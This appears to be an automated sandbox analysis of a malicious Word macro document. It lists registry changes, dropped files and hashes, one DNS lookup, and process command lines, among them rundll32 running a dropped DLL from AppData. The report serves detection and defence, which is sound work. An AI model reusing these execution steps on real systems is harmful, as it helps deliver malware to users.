Analysis Overview
SHA256
54257271a5f00afb180199a38c277e9257e907407ae6d7b9e0e5e425d8fd37e0
Threat Level: Likely malicious
The file 5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Office macro that triggers on suspicious action
Suspicious Office macro
Executes dropped EXE
Loads dropped DLL
Drops file in Windows directory
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Modifies registry class
Checks processor information in registry
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-20 04:19
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-20 04:19
Reported
2024-05-20 04:22
Platform
win7-20240220-en
Max time kernel
120s
Max time network
121s
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc"
C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\etase.dll f1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | groovyshops.org | udp |
Files
| MD5 | 58dc7224876f5c315affada9b6d31ec0 |
| SHA1 | 038d2291e2dbdad36de0b6d2a5e6a5e010c3625f |
| SHA256 | 25dcc5894bc9d2a6076335628d93889a577b96cfd13b5cd61c0b98a87252c6a1 |
| SHA512 | 7954d0c56b3d41198c254cd83244a8da601ba543aea58dbff3b3ab49791af4dd703379f990d8be5dea1facc137ca2fca8cc9aed7e26057b14d6a76aa3fa4237d |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_prompts.help.txt
| MD5 | 5263f71bd3646e84bd7fc85b6ea9db82 |
| SHA1 | 17bf79fc85c4afe74b561170b9e9dc6ddfb24c9e |
| SHA256 | 0c48f1c3d1ce28f9a731121b1b4277c42460833ecf55f50abbc65a894c0ed79f |
| SHA512 | 35b9aab906a4a2332cda05cb3b49abb34c97a0b11faede6919d1c0094bc2d42a4dfec4a95f6dd491bcafa83a831608151826f53fb81382ce8d94730d6d378d9a |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_profiles.help.txt
| MD5 | f7fec7ce76ce7c8f1163b8aa5275c791 |
| SHA1 | 7d49acc9bb5a17c254dfb9c9a0098d404e5bfeae |
| SHA256 | 61722545a8661420eccbbacc9282e4f0631be3d171a7b01d4110345aa3447380 |
| SHA512 | 1baaece78e8548681e0e6b856211d3ba6c15ca26c43e53e8b207da6cb78bc559fb2c1996d3526a875f52b3fdd48dd0eb3396a629d033661e18578f3288274f5d |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_preference_variables.help.txt
| MD5 | a548c6d2b61a2ba99da566c1c639e55a |
| SHA1 | 060593b5742e7aba2445314d7df214d3993e577f |
| SHA256 | d22b122fb81fd51b6630e0ea9ccbb2e149b3f8fd6c5a775195ad5189a924e290 |
| SHA512 | e98ca7585dc96bbf2b94b254d75d49e4d2b481f399f41eaec1701ddef56ea260f5940ea855b87a3c8d120be0cc4e5e93e339488cf4be289b9856255f9bc0307e |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_pipelines.help.txt
| MD5 | 8bad26347fa9efd07e760ae53c1b9fd5 |
| SHA1 | 3d282b9b131fcb240d7040926a7e56a5f3793f09 |
| SHA256 | 7c994f4f914f89b186d8120d78e1d2519195078a4cdfad9d64b94b649d67eb29 |
| SHA512 | 5340d53aac77b36dc2b746695d013d9900130bd22bf90853ea23d6934816534d90b42c826bf04fca1fe4bda3b407cd4f40b8a94a6c48ca8bf24661d8567866d6 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Path_Syntax.help.txt
| MD5 | cb9310ff0c4deaa5c5d2122bb71172c4 |
| SHA1 | 8ad2a35eda436c3debf46dcf0ab35deac8adaddf |
| SHA256 | 183797d3d4c1de11b5585763f330a2e0d545b7a20e8ba8d56cc7e671840c479e |
| SHA512 | c32174400718ed734ff989c42048c8b18cd5652b2a03bec6daadb9a6b4d87fe1b9f6f5a7b8dafe168d4e78988b7a67accf11a22030723ebe2effef3d92ae90be |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Parsing.help.txt
| MD5 | 9664348ff9b20b15536c5f553537ac42 |
| SHA1 | 1252efa4f9ee317a0cbf3b4e03179f28f0d90a5e |
| SHA256 | 7121edcc9138522d63e6fd8fba0d802bc46164bc0170c53150023258fdafcdc9 |
| SHA512 | 7586688dc35f68f89024437697b12c55dfc0aaab0cd90c1bd90038ddebae264b530a94c348b164c25f6401dfb8a8b1982de788c95e8fe637c4ceb7e8d3c9c4df |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_parameters.help.txt
| MD5 | ef2bc3cfaa2efe20aabea53e0779c8c1 |
| SHA1 | af1285eaba2a85a6cdd5a29d64736b8d833b99fc |
| SHA256 | c79097b672963d913d9d6895897e3deab7854506001ce605456bddcecccddb02 |
| SHA512 | 52fb4ced0dd9b78ddf4ba59f33eda68c11adfca55ff909cc888b30f9b2e01270d0c13d7ed272b385a9c5866283db41bdde1482421fd5d8c13dccec3bece87853 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_operators.help.txt
| MD5 | 461d21104ec5efad438b578712112cf4 |
| SHA1 | 629a98883436148703786469b66e652e8a0f0032 |
| SHA256 | 15bee3e93abc1fe748837e1bfce817257a6170e48c38381c58a811cd49bce894 |
